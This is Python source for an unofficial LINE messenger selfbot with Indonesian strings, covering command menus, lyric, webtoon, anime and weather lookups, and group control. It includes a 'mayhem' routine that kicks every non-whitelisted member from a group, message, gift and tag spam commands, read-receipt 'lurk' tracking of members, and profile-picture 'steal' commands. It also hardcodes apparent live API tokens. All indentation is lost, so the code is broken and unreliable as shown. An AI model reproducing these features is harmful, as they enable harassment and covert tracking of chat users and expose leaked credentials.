def list(self,wait):return "╭───「 List 」─\n│ | Command | \n│Group\n│ Key: "+wait["setkey"].title()+" grouplist\n│Square\n│ Key: "+wait["setkey"].title()+" squarelist\n│Sticker\n│ Key: "+wait["setkey"].title()+" list sticker\n│Image\n│ Key: "+wait["setkey"].title()+" list pict\n│WhiteList\n│ Key: "+wait["setkey"].title()+" whitelist\n│BlackList\n│ Key: "+wait["setkey"].title()+" blacklist\n│MimicList\n│ Key: "+wait["setkey"].title()+" mimiclist\n╰──────"
def group(self,wait):return "╭───「 Group 」─\n│ | Command | \n│Auto Respon\n│ Key: "+wait["setkey"].title()+" autorespon\n│Welcome Message\n│ Key: "+wait["setkey"].title()+" welcomemsg\n│Leave Message\n│ Key: "+wait["setkey"].title()+" leavemsg\n│Search Contact\n│ Key: "+wait["setkey"].title()+" get group [@]\n│Get Note\n│ Key: "+wait["setkey"].title()+" get note\n│ Key: "+wait["setkey"].title()+" get note [num]\n│Get Album\n│ Key: "+wait["setkey"].title()+" get album\n│ Key: "+wait["setkey"].title()+" get album [1] [<|>|-|num]\n╰──────"
def friend(self,wait):return "╭───「 Friend 」─\n│ | Command | \n│List Friends\n│ Key: "+wait["setkey"].title()+" friendlist\n│Del Friend\n│ Key: "+wait["setkey"].title()+" del friend [on|<|>|-|@|num]\n│BlockList\n│ Key: "+wait["setkey"].title()+" blocklist\n│Del Blcok\n│ Key: "+wait["setkey"].title()+" del block [<|>|-|num]\n╰──────"
def Announcementssa(self,wait):return "╭───「 Announcements 」─\n│ | Command | \n│Create Announcements\n│ Key: "+wait["setkey"].title()+" announ create lock [text]\n│ Key: "+wait["setkey"].title()+" announ create unlock [text]\n│ Key: "+wait["setkey"].title()+" announ create all [text]\n│Announcements Del\n│ Key: "+wait["setkey"].title()+" announ clear\n│Get Announcements\n│ Key: "+wait["setkey"].title()+" get announ\n│ Key: "+wait["setkey"].title()+" get announ [num]\n╰──────"
def mykeyoff(self,wait):wait["setkey"] = "";return " 「 Rname 」\nKey has been set to DISABLED♪"
def mykeyreset(self,wait):wait["setkey"] = "anbot";return " 「 Rname 」\nKey has been set to "+wait["setkey"].title()
def github(self,wait):return"╭───「 Github 」─\n│ | Command | \n│Search User\n│ Key: "+wait["setkey"].title()+" github [username]\n│Search User Follower\n│ Key: "+wait["setkey"].title()+" gitfol [username]\n│Search User Repostory\n│ Key: "+wait["setkey"].title()+" gitrepos [username]\n╰──────"
def profdetail(self,wait):return "╭───「 Profile 」─\n│ | Command | \n│Change Profile Picture\n│ Key: "+wait["setkey"].title()+" changedp\n│ Key: "+wait["setkey"].title()+" changedp video\n│Change Group Picture\n│ Key: "+wait["setkey"].title()+" changedp group\n│Change Name\n│ Key: "+wait["setkey"].title()+" myname [text]\n│Change Status\n│ Key: "+wait["setkey"].title()+" mybio [enter|text]\n╰──────"
def broadcast(self,wait):return "╭───「 Broadcast 」─\n│ | Command | \n│All\n│ Key: "+wait["setkey"].title()+" broadcast 1 [text]\n│Contact\n│ Key: "+wait["setkey"].title()+" broadcast 2 [text]\n│Group\n│ Key: "+wait["setkey"].title()+" broadcast 3 [text]\n╰──────"
def autjoin(self,wait,msg):
if wait['autoJoin'] == True:
msgs=" 「 Auto Join 」\nState: ENABLED♪\nState: "+str(wait["Members"])+" Available join\n"
else:
msgs=" 「 Auto Join 」\nState: DISABLED♪\nState: "+str(wait["Members"])+" Available join\n"
self.sendMessage(msg.to, msgs+"\n |Command|\n- Autojoin group\n Usage:"+wait["setkey"]+" autojoin [on|off]\n- Available min join\n Usage:"+wait["setkey"]+" autojoin set <num>")
def aborted(self,wait,msg):
a = ' 「 Abort 」'
try:
if wait['talkban']['cvp'] == True:
wait['talkban']['pict'] = ''
wait['talkban']['cvp'] = False
except:
wait['talkban']['pict'] = ''
wait['talkban']['cvp'] = False
a+= '\nChange Profile Video Dibatalkan'
if wait["Addimage"] == True:
wait["Addimage"] = False
a+= '\nAdd Pict Dibatalkan'
if wait["ChangeDP"] == True:
wait["ChangeDP"] = False
a+= '\nChangeDP Dibatalkan'
if msg.to in wait["setTimess"]:
wait["setTimess"].remove(msg.to)
a+= '\nChangeDP Group Dibatalkan'
return a
def lyric(self,to,text):
try:
r = requests.get("https://api.genius.com/search?q="+text+"&access_token=2j351ColWKXXVxq1PdUNXDYECI2x4zClLyyAJJkrIeX8K7AQ0F-HTmWfG6tNVszO")
data = r.json()
hits = data["response"]["hits"][0]["result"]["api_path"]
title= "\nTitle: "+data["response"]["hits"][0]["result"]["title"].strip()
oleh = "\nArtis: "+data["response"]["hits"][0]["result"]["primary_artist"]["name"].strip()
g = data["response"]["hits"][0]["result"]['song_art_image_thumbnail_url']
r1 = requests.get("https://api.genius.com"+hits+"?&access_token=2j351ColWKXXVxq1PdUNXDYECI2x4zClLyyAJJkrIeX8K7AQ0F-HTmWfG6tNVszO")
data1 = r1.json()
path = data1["response"]["song"]["path"]
release = data1["response"]["song"]["release_date"]
page_url = "http://genius.com" + path
page = requests.get(page_url)
html = BeautifulSoup(page.text, "html.parser")
[h.extract() for h in html('script')]
lyrics = html.find("div", class_="lyrics").get_text().strip()
pesan = " 「 Lyric 」"+title+oleh+'\n'+lyrics
k = len(pesan)//10000
for aa in range(k+1):
self.sendMessage(to,'{}'.format(pesan[aa*10000 : (aa+1)*10000]))
except:
self.sendMessage(to,"「 404 」\nStatus: Error\nReason: I'cant found lyric {}".format(text))
def eksekusilurk(self,op,wait):
try:
if op.param1 in wait['readPoint']:
if op.param2 in wait['ROM1'][op.param1]:
wait['setTime'][op.param1][op.param2] = op.createdTime
else:
wait['ROM1'][op.param1][op.param2] = op.param2
wait['setTime'][op.param1][op.param2] = op.createdTime
try:
if wait['lurkauto'] == True:
if len(wait['setTime'][op.param1]) % 5 == 0:
self.anulurk(op.param1,wait)
except:pass
elif op.param2 in wait['readPoints']:
wait['lurkt'][op.param1][op.param2][op.param3] = op.createdTime
wait['lurkp'][op.param1][op.param2][op.param3] = op.param2
else:pass
except:
pass
def blekedok(self,t:int=None,tt:str=None):
r = requests.get('https://www.webtoons.com/id/genre')
soup = BeautifulSoup(r.text,'html5lib')
data = soup.find_all(class_='card_lst')
datea = data[t].find_all(class_='info')
if tt == 'data':
return datea
else:
return data[t].find_all('a')
def kbbi(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
data = KBBI(self.adityasplittext(msg.text.lower()))
self.sendMessage(msg.to,'{}'.format(data))
def wikipedia(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
try:
wiki = WikiApi({'locale' : 'id'})
result = wiki.find(self.adityasplittext(msg.text.lower()))
b = random.randint(0,len(result)-1)
article = wiki.get_article(result[b])
a=" 「 Wikipedia 」\nType: Wikipedia Definition\nData: Wikipedia {} #{} from #{}".format(self.adityasplittext(msg.text.lower()),b+1,len(result))
a+= "\nSummary:\n{}".format(article.summary)
self.sendMessage(msg.to,a, self.templatefoot(article.url,"http://dl.profile.line-cdn.net/" + self.getProfile().picturePath,self.adityasplittext(msg.text.lower())))
except:
self.sendMessage(msg.to," 「 Wikipedia 」\nType: Wikipedia Definition\nData: Wikipedia {} Not Found".format(self.adityasplittext(msg.text.lower())), self.templatefoot('line://ti/p/~{}'.format(self.profile.userid),"http://dl.profile.line-cdn.net/" + self.getProfile().picturePath,self.adityasplittext(msg.text.lower())))
def urbandata(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
try:
data = self.adityarequestweb('http://api.urbandictionary.com/v0/define?term={}'.format(self.adityasplittext(msg.text.lower())))
b = random.randint(0,len(data['list'])-1)
a=" 「 Urban 」\nType: Urban Definition\nData: Urban {} #{} from #{}".format(self.adityasplittext(msg.text.lower()),b+1,len(data['list']))
a+= "\nAuthor: {}\nDictionary:\n{}\n\nExample: {}".format(data['list'][b]['author'],data['list'][b]['definition'],data['list'][b]['example'])
self.sendMessage(msg.to,a, self.templatefoot(data['list'][b]['permalink'],"http://dl.profile.line-cdn.net/" + self.getProfile().picturePath,data['list'][b]['word']))
except:
self.sendMessage(msg.to," 「 Urban 」\nType: Urban Definition\nData: Urban {} Not Found".format(self.adityasplittext(msg.text.lower())), self.templatefoot('line://ti/p/~{}'.format(self.profile.userid),"http://dl.profile.line-cdn.net/" + self.getProfile().picturePath,self.adityasplittext(msg.text.lower())))
def WebtoonDrama(self,msg):
msg.text = self.mycmd(msg.text,wait)
drama = msg.text.split(' ')[1].lower()
try:
if drama == 'drama':aa = 0
if drama == 'fantasi':aa = 1
if drama == 'comedy':aa = 2
if drama == 'sol':aa = 3
if drama == 'romance':aa = 4
if drama == 'thriller':aa = 5
if drama == 'horror':aa = 6
a = self.blekedok(aa,'data')
try:
if int(msg.text.split(' ')[2]) > len(a):
return self.sendMessage(msg.to,' 「 Webtoon 」\nDaftar Webtoon {} urutan ke {} tidak ditemukan'.format(drama.title(),msg.text.split(' ')[2]))
gd = self.blekedok(aa)[int(msg.text.split(' ')[2])-1].get('href')
b = requests.get(gd)
soup1 = BeautifulSoup(b.text,'html5lib')
data11 = soup1.find_all(class_='subj')
data1 = soup1.find_all(class_='date')
data2 = soup1.find_all(id='_listUl')
data3 = data2[0].find_all('a')
A = ' 「 Webtoon 」\n | {} |'.format(a[int(msg.text.split(' ')[2])-1].find_all('p')[0].text)
for c in range(0,10):
if c+1 == 1:AA = '\n'
else:AA = '\n\n'
A+= '{}{}. {} | {}\n {}'.format(AA,c+1,data11[c+1].text,data1[c].text.strip(),data3[c].get('href'))
self.sendMessage(msg.to,A)
except:
A = ' 「 Webtoon 」\n | {} |'.format(drama.replace('sol','slice of life').title())
no=0
for b in a:
no+=1
if no == 1:AA = '\n'
else:AA = '\n\n'
if len(str(no)) == 1:cdd = '\n Author: {}'.format(b.find_all('p')[1].text)
if len(str(no)) == 2:cdd = '\n Author: {}'.format(b.find_all('p')[1].text)
A+= '{}{}. {} | {} Like{}'.format(AA,no,b.find_all('p')[0].text[:20],b.find_all('p')[2].find_all('em')[0].text,cdd)
self.sendMessage(msg.to,A)
except Exception as e:self.sendMessage(msg.to,str(e))
def albumNamaGrup(self,msg,wait):
to = msg.to
ha = self.getGroupAlbum(to)
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower() == 'get album':
a = [a['title'] for a in ha['result']['items']];c=[a['photoCount'] for a in ha['result']['items']]
b = '╭「 Album Group 」'
no=0
for i in range(len(a)):
no+=1
if no == len(a):b+= '\n╰{}. {} | {}'.format(no,a[i],c[i])
else:b+= '\n│{}. {} | {}'.format(no,a[i],c[i])
self.sendMessage(to,"{}".format(b))
if msg.text.lower().startswith('get album '):
a = msg.text.split(' ')
selection = AdityaSplitGood(a[3],range(1,len(ha['result']['items'])+1))
for i in selection.parse():
try:
b = random.randint(0,999)
self.getImageGroupAlbum(msg.to,ha['result']['items'][int(a[2])-1]['id'], ha['result']['items'][int(a[2])-1]['recentPhotos'][i-1]['oid'], returnAs='path', saveAs='{}.png'.format(b))
self.sendImage(msg.to,'{}.png'.format(b))
os.remove('{}.png'.format(b))
except:continue
else:
a = msg.text.split(' ')
if len(a) == 5:
wait["Images"]['anu']=ha['result']['items'][int(a[4])-1]['id']
wait['ChangeGDP'] = True
self.sendMessage(msg.to," 「 Album 」\nSend a Picture for add to album")
def datamention(self,msg,text,data,ps=''):
if(data == [] or data == {}):return self.sendMention(msg.to," 「 {} 」\nMaaf @! data tidak ditemukan".format(text),text,[msg._from])
k = len(data)//100
for aa in range(k+1):
if aa == 0:dd = '╭「 {} 」─{}'.format(text,ps);no=aa
else:dd = '├「 {} 」─{}'.format(text,ps);no=aa*100
msgas = dd
for i in data[aa*100 : (aa+1)*100]:
no+=1
if no == len(data):msgas+='\n╰{}. @!'.format(no)
else:msgas+='\n│{}. @!'.format(no)
self.sendMention(msg.to, msgas,' 「 {} 」'.format(text), data[aa*100 : (aa+1)*100])
def mentionalfl(self,msg,wait):
msg.text = msg.text = self.mycmd(msg.text,wait)
if msg.text.lower().startswith('friendlist '):
if len(msg.text.split(' ')) == 2:
a = self.refreshContacts()
self.getinformation(msg.to,a[int(msg.text.split(' ')[1])-1],wait)
if msg.text.lower() == 'friendlist':a = self.refreshContacts();self.datamention(msg,'List Friend',a)
if msg.text.lower() == 'friend request':
a = self.getRecommendationIds()
self.sendMessage(msg.to,'{}'.format(a)[:10000])
if msg.text.lower() == 'blocklist':a = self.getBlockedRecommendationIds();self.datamention(msg,'List Block',a)
def datamentions(self,msg,text,data,date,wait,ps=''):
if(data == [] or data == {}):return self.sendMention(msg.to," 「 {} 」\nMaaf @! data tidak ditemukan".format(text),text,[msg._from])
k = len(data)//100
for aa in range(k+1):
if aa == 0:dd = '╭「 {} 」─{}'.format(text,ps);no=aa
else:dd = '├「 {} 」─{}'.format(text,ps);no=aa*100
msgas = dd
for i in data[aa*100 : (aa+1)*100]:
no+=1
if date == 'ADDWL':
if i in wait["bots"]:a = 'WL User'
else:
if i not in wait["blacklist"]:a = 'Add WL';wait["bots"].append(i)
else:a = 'BL User'
if date == 'DELWL':
try:wait["bots"].remove(i);a = 'Del WL'
except:a = 'Not WL User'
if date == 'ADDBL':
if i in wait["bots"]:a = 'WL User'
else:
if i not in wait["blacklist"]:a = 'Add BL';wait["blacklist"].append(i)
else:a = 'BL User'
if date == 'DELBL':
try:wait["blacklist"].remove(i);a = 'Del BL'
except:a = 'Not BL User'
if date == 'DELFL':
try:self.AdityadeleteContact(i);a = 'Del Friend'
except:a = 'Not Friend User'
if date == 'ADDML':
if i in wait["target"]:a = 'ML User'
else:a = 'Add ML';wait["target"].append(i)
if date == 'DELML':
try:wait["target"].remove(i);a = 'Del ML'
except:a = 'Not ML User'
if no == len(data):msgas+='\n╰{}. @!{}'.format(no,a)
else:msgas+='\n│{}. @!{}'.format(no,a)
self.sendMention(msg.to, msgas,' 「 {} 」'.format(text), data[aa*100 : (aa+1)*100])
def ekseuksi(self,wait,msg):
to = msg.to
msg.text = self.mycmd(msg.text,wait)
dits = msg.text.lower()
if 'MENTION' in msg.contentMetadata.keys()!=None:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
if dits.startswith('addbl '):self.datamentions(msg,'Blacklist',targets,'ADDBL',wait,ps='\n├ Type: Add Blacklist')
elif dits.startswith('delbl '):self.datamentions(msg,'Blacklist',targets,'DELBL',wait,ps='\n├ Type: Delete Blacklist')
elif dits.startswith('addwl '):self.datamentions(msg,'Whitelist',targets,'ADDWL',wait,ps='\n├ Type: Add Whitelist')
elif dits.startswith('delwl '):self.datamentions(msg,'Whitelist',targets,'DELWL',wait,ps='\n├ Type: Delete Whitelist')
elif dits.startswith('addml '):self.datamentions(msg,'Mimiclist',targets,'ADDML',wait,ps='\n├ Type: Add Mimiclist')
elif dits.startswith('delml '):self.datamentions(msg,'Mimiclist',targets,'DELML',wait,ps='\n├ Type: Delete Mimiclist')
elif dits.startswith('del friend '):self.datamentions(msg,'Friendlist',targets,'DELFL',wait,ps='\n├ Type: Delete Friendlist')
else:
if dits.startswith('delbl '):self.adityaarchi(wait,'Blacklist','delbl',to,self.adityasplittext(msg.text),msg,'\n├ Type: Delete Blacklist',nama=wait['blacklist'])
if dits.startswith('delwl '):self.adityaarchi(wait,'Whitelist','delwl',to,self.adityasplittext(msg.text),msg,'\n├ Type: Delete Whitelist',nama=wait['bots'])
if dits.startswith('delml '):self.adityaarchi(wait,'Mimiclist','delml',to,self.adityasplittext(msg.text),msg,'\n├ Type: Delete Mimiclist',nama=wait['target'])
if dits.startswith('del friend ') or dits == 'del friend on':
if dits == 'del friend on':return self.adityanuindata(to,'Friendlist',wait["Anime"],'DELFriendlist',wait)
self.sendMessage(to,' 「 Friendlist 」\nWaiting.....');self.adityaarchi(wait,'Friendlist','delfriend',to,self.adityasplittext(msg.text,'s'),msg,'\n├ Type: Delete Friendlist',nama=self.refreshContacts())
if dits.startswith('del block '):self.sendMessage(to,' 「 Blocklist 」\nWaiting.....');self.adityaarchi(wait,'Blocklist','delblock',to,self.adityasplittext(msg.text,'s'),msg,'\n├ Type: Delete Blocklist',nama=self.getBlockedRecommendationIds())
def mentionmention(self,to,wait, text, dataMid=[], pl='', ps='',pg='',pt=[]):
arr = []
list_text=ps
i=0
no=pl
if pg == 'MENTIONALLUNSED':
for l in dataMid:
no+=1
if no == len(pt):list_text+='\n╰'+str(no)+'. @[adit-'+str(i)+'] '
else:list_text+='\n│'+str(no)+'. @[adit-'+str(i)+'] '
i=i+1
text=list_text+text
if pg == 'SIDERMES':
for l in dataMid:
chiya = []
for rom in wait["lurkt"][to][dataMid[0]].items():
chiya.append(rom[1])
for b in chiya:
a = '{}'.format(humanize.naturaltime(datetime.fromtimestamp(b/1000)))
no+=1
if no == len(pt):list_text+='\n│'+str(no)+'. @[adit-'+str(i)+']\n╰ 「 '+a+" 」"
else:list_text+='\n│'+str(no)+'. @[adit-'+str(i)+']\n│ 「 '+a+" 」"
i=i+1
text=list_text+text
if pg == 'DELML':
for l in dataMid:
if l not in wait["target"]:
a = 'Not ML User'
else:
a = 'DEL ML'
wait["target"].remove(l)
no+=1
if no == len(pt):list_text+='\n╰'+str(no)+'. @[adit-'+str(i)+'] '+a
else:list_text+='\n│'+str(no)+'. @[adit-'+str(i)+'] '+a
i=i+1
text=list_text
i=0
for l in dataMid:
mid=l
name='@[adit-'+str(i)+']'
ln_text=text.replace('\n',' ')
if ln_text.find(name):
line_s=int( ln_text.index(name) )
line_e=(int(line_s)+int( len(name) ))
arrData={'S': str(line_s), 'E': str(line_e), 'M': mid}
arr.append(arrData)
i=i+1
contentMetadata={'MENTION':str('{"MENTIONEES":' + json.dumps(arr).replace(' ','') + '}')}
if pg == 'MENTIONALLUNSED':self.unsendMessage(self.sendMessage(to, text, contentMetadata).id)
else:self.sendMessage(to, text, contentMetadata)
def pictlock(self,msg,wait):
if msg.text.lower().startswith('pict lock '):
spl = msg.text.lower().replace('pict lock ','')
if spl == 'on':
contact = self.getGroup(msg.to).pictureStatus
cu = "http://dl.profile.line-cdn.net/" + contact
if msg.to in wait['ppict']:
msgs=" 「 Picture Lock 」\nStatus: already ENABLED♪"
wait['GN'] = True
else:
msgs=" 「 Picture Lock 」\nStatus: set to ENABLED♪"
wait['ppict'].append(msg.to)
wait['GN'] = True
wait['pro_pict'][msg.to] = 'dataSeen/'+msg.to+'.png'
self.sendMessage(msg.to, msgs)
self.sendImageWithURL(msg.to,cu)
if spl == 'off':
if msg.to in wait['ppict']:
msgs=" 「 Picture Lock 」\nStatus: set to DISABLED♪"
wait['ppict'].remove(msg.to)
else:
msgs=" 「 Picture Lock 」\nStatus: already DISABLED♪"
self.sendMessage(msg.to, msgs)
def adityanuindata(self,to,text,data,pl,wait):
if 'ADDWhitelist' in pl:
wait["wwhitelist"] = True
b = " 「 {} 」\nType: Add {}\nStatus: Turned ON\nSend a contact to add into {}♪".format(text,text,text)
if 'ADDBlacklist' in pl:
wait["wblacklist"] = True
b = " 「 {} 」\nType: Add {}\nStatus: Turned ON\nSend a contact to add into {}♪".format(text,text,text)
if 'DELWhitelist' in pl:
wait["dwhitelist"] = True
b = " 「 {} 」\nType: Delete {}\nStatus: Turned ON\nSend a contact to delete from {}♪".format(text,text,text)
if 'DELBlacklist' in pl:
wait["dblacklist"] = True
b = " 「 {} 」\nType: Delete {}\nStatus: Turned ON\nSend a contact to delete from {}♪".format(text,text,text)
if 'DELFriendlist' in pl:
wait["Anime"] = True
b = " 「 {} 」\nType: Delete {}\nStatus: Turned ON\nSend a contact to delete from {}♪".format(text,text,text)
self.sendMessage(to,b)
def changedpgroup(self,wait,msg):
if msg.toType == 2:
if msg.to not in wait["setTimess"]:
wait["setTimess"].append(msg.to)
self.sendMessage(msg.to, " 「 Group 」\nType: Change Cover Group\nStatus: Send the image....")
def spam(self,wait):return "╭───「 Spam 」─\n│ | Command | \n│Message\n│ Key: "+wait["setkey"].title()+"spam 1 [1][enter|text]\n│Gift\n│ Key: "+wait["setkey"].title()+"spam 2 [1][@|]\n│Contact\n│ Key: "+wait["setkey"].title()+"spam 3 [1][@]\n│Tag\n│ Key: "+wait["setkey"].title()+"spam 4 [1][@]\n╰──────"
def mykey(self,wait):
if wait["setkey"] == '':return "Your Prefix : [On]\nPrefix change - [query]\nPrefix off - Disable\nPrefix Reset - Reset the Prefix"
else:return "Your Prefix : " + wait["setkey"].title() + "\nReprefix: - [query]\nPrefix Off - Disable\nPrefix Reset - Reset the Prefix"
def getid(self,wait,msg,dits):
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
self.getinformation(msg.to,key1,wait)
else:
if dits.startswith("getid"):
if len(dits.split(' ')) == 2:
a = self.getGroupIdsJoined()
self.getinformation(msg.to,a[int(dits.split(' ')[1])-1],wait)
if dits == 'getid':self.getinformation(msg.to,msg.to,wait)
def stealcover(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower().startswith('steal cover') or msg.text.lower() == 'steal cover' or msg.text.lower() == 'my cover':
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
self.sendImageWithURL(msg.to,'{}'.format(self.getProfileCoverURL(key1)),'Cover Picture')
else:
if msg.text.lower() == 'my cover':
self.sendImageWithURL(msg.to,'{}'.format(self.getProfileCoverURL(msg._from)),'Cover Picture')
if msg.text.lower() == 'steal cover':
if msg.toType == 2:
return
self.sendImageWithURL(msg.to,'{}'.format(self.getProfileCoverURL(msg.to)),'Cover Picture')
def stealpp(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower().startswith('steal pp') or msg.text.lower() == 'steal pp' or msg.text.lower() == 'my pp':
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
try:contact = self.getGroup(key1)
except:contact = self.getContact(key1)
try:
cu = "http://dl.profile.line.naver.jp"+ contact.picturePath + "/vp"
self.sendVideoWithURL(msg.to,cu)
cu = "http://dl.profile.line.naver.jp" + contact.picturePath
self.sendImageWithURL(msg.to,cu,'{} Picture'.format(contact.displayName))
except:
cu = "http://dl.profile.line.naver.jp" + contact.picturePath
self.sendImageWithURL(msg.to,cu,'{} Picture'.format(contact.displayName))
else:
if msg.text.lower() == 'steal pp':to = msg.to
if msg.text.lower() == 'my pp':to = msg._from
if msg.toType == 2:contact = self.getGroup(to);pppp = contact.name
else:contact = self.getContact(to);pppp = contact.displayName
try:
cu = "http://dl.profile.line.naver.jp"+ contact.picturePath + "/vp"
self.sendVideoWithURL(msg.to,cu)
except:
cu = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
self.sendImageWithURL(msg.to,cu,'{} Picture'.format(pppp))
def mayhem(self,msg):
a = []
b = self.getGroup(msg.to)
for i in b.members:
if i.mid not in wait["bots"]:
a.append(i.mid)
self.sendMessage(msg.to," 「 Mayhem 」\nMayhem is STARTING♪\n'abort' to abort♪""")
self.sendMessage(msg.to," 「 Mayhem 」\n %i victims shall yell hul·la·ba·loo♪\n/ˌhələbəˈlo͞o,ˈhələbəˌlo͞o/" % len(a))
for c in a:
self.kickoutFromGroup(msg.to,[c])
def sendMessages(self, messageObject):
return self.talk.sendMessage(0, messageObject)
def AdityaWeather(self,msg):
msg.text = self.mycmd(msg.text,wait)
ts = self.adityasplittext(msg.text)
t = msg.to
try:
data = self.adityarequestweb("https://query.yahooapis.com/v1/public/yql?q=select%20*%20from%20weather.forecast%20where%20woeid%20in%20(select%20woeid%20from%20geo.places(1)%20where%20text%3D%22{}%2C%20id%22)&format=json&env=store%3A%2F%2Fdatatables.org%2Falltableswithkeys".format(ts))
wloc = data['query']['results']['channel']['location']
wlocs = data['query']['results']['channel']['item']['condition']
wlocss = data['query']['results']['channel']['wind']
wlocsss = data['query']['results']['channel']['atmosphere']
b = float(data['query']['results']['channel']['item']['lat'])
h = float(data['query']['results']['channel']['item']['long'])
a = '🔭 Prakiraan Cuaca\n{},{} {}\n\nTemperatur {} \u00b0C {}\nRange 22 sd 28 \u00b0C\nAngin {}.{} km/h\nDengan Arah {}\u00b0\nKelembapan {}%\n\n🗓 {}'.format(wloc['city'],wloc['region'],wloc['country'],wlocs['code'],wlocs['text'],wlocss['speed'],wlocss['chill'],wlocss['direction'],wlocsss['humidity'],data['query']['results']['channel']['lastBuildDate'])
self.sendMessage(t,a)
msgs = Message()
msgs.to = msg.to
msgs.location=Location(longitude=h, address='{}.{} {}'.format(wloc['city'],wloc['region'],wloc['country']), title=' 「 Location 」', phone=None, latitude=b)
self.sendMessages(msgs)
except:
return self.sendMessage(t, "Lokasi Tidak Ditemukan")
def lurk(self,to,data):
wait = data
if 'lurkauto' not in wait:wait['lurkauto'] = False
if wait['lurkauto'] == False:sd = "\n│Lurk Auto: OFF"
else:sd = "\n│Lurk Auto: ON"
if to in data['readPoint']:
a = "\n│Lurk State: ON"+sd
else:
a = "\n│Lurk State: OFF"+sd
if to in data["lurkp"]:
if data["lurkp"][to] == {}:
b='\n╰Lurk People: None'
h="╭「 Lurk 」─"+a+"\n│ | Command | \n│Lurtk Point\n│ Key: "+data["setkey"].title()+" lurk on\n│ Key: "+data["setkey"].title()+" lurk auto on\n│Lurk Del\n│ Key: "+data["setkey"].title()+" lurk off\n│ Key: "+data["setkey"].title()+" lurk auto off\n│Lurk Cek\n│ Key: "+data["setkey"].title()+" lurk result"
self.sendMessage(to,h+b)
else:
h= "╭「 Lurk 」─"+a+"\n│ | Command | \n│Lurk Point\n│ Key: "+data["setkey"].title()+" lurk on\n│ Key: "+data["setkey"].title()+" lurk auto on\n│Lurk Del\n│ Key: "+data["setkey"].title()+" lurk off\n│ Key: "+data["setkey"].title()+" lurk auto off\n│Lurk Cek\n│ Key: "+data["setkey"].title()+" lurk result\n│Lurk People: {}".format(len(data["lurkp"][to]))
no=0
hh = []
for c in data["lurkp"][to]:
no+=1
hh.append(c)
if no == len(data["lurkp"][to]):h+= '\n╰ {}. @!'.format(no)
else:h+= '\n│ {}. @!'.format(no)
self.sendMention(to,h,'',hh)
else:
b='\n╰Lurk People: None'
h="╭「 Lurk 」─"+a+"\n│ | Command | \n│Lurk Point\n│ Key: "+data["setkey"].title()+" lurk on\n│ Key: "+data["setkey"].title()+" lurk auto on\n│Lurk Del\n│ Key: "+data["setkey"].title()+" lurk off\n│ Key: "+data["setkey"].title()+" lurk auto off\n│Lurk Cek\n│ Key: "+data["setkey"].title()+" lurk result"
self.sendMessage(to,h+b)
def animeget(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
r = requests.get('https://www.kurogaze.top/ongoing-anime/')
s = BeautifulSoup(r.text,'html5lib')
dd = s.select('ul > li > div.sera > a.series')
sgd = s.select('ul > li > div.sera > a.series > div.title > span')
if msg.text.lower().startswith('anilist'):
if len(msg.text.split(' ')) == 1:
d = '╭「 Anime List 」'
no = 0
for c in sgd:
no+=1
if no == len(sgd):sdk = '╰'
else:sdk = '│'
d+= '\n{}{}. {}'.format(sdk,no,c.text.replace('no Imouto','no\n│ Imouto').replace('– Kaikou','–\n│ Kaikou').replace('Gale Online','Gale\n│ Online').replace('Genwaku Kitan','Genwaku\n│ Kitan').replace('Izakaya Nobu','Izakaya\n│ Nobu').replace('no Monogatari','no\n│ Monogatari'))
self.sendMessage(msg.to,'{}'.format(d))
if len(msg.text.split(' ')) == 2:
ds = dd[int(msg.text.split(' ')[1])-1]
sgd = sgd[int(msg.text.split(' ')[1])-1]
self.sendMessage(msg.to,' 「 Anime 」\nStatus: Waiting....\nRequest: Get a {}'.format(sgd.text))
r = requests.get(ds.get('href'))
s = BeautifulSoup(r.text,'html5lib')
dd = s.select('div.episodelist > ul > li > span.t1 > a')
ddd = s.select('div.episodelist > ul > li > span.t2')
d = ' 「 Epsiode List 」\n | Anime {} |'.format(sgd.text)
no = 0
dd = [c.text.strip() for c in dd];dd.reverse()
ddd = [c.text.strip() for c in ddd];ddd.reverse()
for c in range(0,len(dd)):
no+=1
d+= '\n{}. {} | {}'.format(no,dd[c],ddd[c])
self.sendMessage(msg.to,d)
if len(msg.text.split(' ')) == 3:
ds = dd[int(msg.text.split(' ')[1])-1]
sgd = sgd[int(msg.text.split(' ')[1])-1]
self.sendMessage(msg.to,' 「 Anime 」\nStatus: Waiting....\nRequest: Get a {}\nTarget: {}'.format(sgd.text,msg.text.split(' ')[2]))
r = requests.get(ds.get('href'))
s = BeautifulSoup(r.text,'html5lib')
dd = s.select('div.episodelist > ul > li > span.t3 > a')
dd = [c.get('href') for c in dd]
dd.reverse()
ds = dd[int(msg.text.split(' ')[2])-1]
r = requests.get(ds)
s = BeautifulSoup(r.text,'html5lib')
try:
try:
sdd = s.select('div.thumbnail')[0].find('img')['data-lazy-src']
self.sendImageWithURL(msg.to,sdd,'Anime')
except:
pass
sd = s.select('div.dl-box > div > a')
ggg = " 「 {} 」".format(s.select('div.headpost > h1.title')[0].text)
h = [self.google_url_shorten(a.get('href')) for a in sd if a.text == 'GDrive']
ggg+= '\n{}\n\n{}\n\n | Downloader |\n 1. 240P {}\n 2. 360P {}\n 3. 480P {}\n 4. 720P {}'.format(s.select('div.singlecontent > p')[0].text,s.select('div.singlecontent > p')[1].text.replace('Genres','\nGenres').replace('Credit','\nCredit'),h[0],h[1],h[2],h[3])
self.sendMessage(msg.to,ggg)
except:self.sendMessage(msg.to," 「 404 」\nStatus: Error So sorry I'cant Find a Video or maybe this episode hasbeen del")
def google_url_shorten(self,url):
req_url = 'https://www.googleapis.com/urlshortener/v1/url?key=AIzaSyAzrJV41pMMDFUVPU0wRLtxlbEU-UkHMcI'
payload = {'longUrl': url}
